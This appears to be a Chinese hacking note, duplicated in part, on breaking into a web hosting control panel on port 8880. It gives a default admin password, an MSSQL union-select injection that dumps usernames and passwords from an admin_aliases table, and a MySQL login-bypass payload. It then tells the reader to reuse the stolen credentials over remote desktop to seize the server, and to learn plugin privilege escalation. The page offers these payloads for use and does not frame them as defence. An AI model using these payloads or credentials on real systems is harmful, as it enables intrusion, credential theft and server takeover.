1,在http://xxxxxx.com:8880这里,默认的管理员账户密码是admin 密码stepu
mssql版本
账号 ' union select top 1 login+char(124)+passwd from admin_aliases--
报错,爆出账号密码
登陆后server-->remote desktop账号密码一样
拿到服务器权限
mysql版本
'union select '-1 union select 1,1,1#'# 密码填 1
1,在http://xxxxxx.com:8880这里,默认的管理员账户密码是admin 密码stepu
mssql版本
账号 ' union select top 1 login+char(124)+passwd from admin_aliases--
报错,爆出账号密码
登陆后server-->remote desktop账号密码一样
拿到服务器权限
mysql版本
'union select '-1 union select 1,1,1#'# 密码填 1
高危预警
通过多次测试。重要掌握dz 所有插件提权的方法。
举报文章
请选择举报类型
补充说明
0/200
上传截图
格式支持JPEG/PNG/JPG,图片不超过1.9M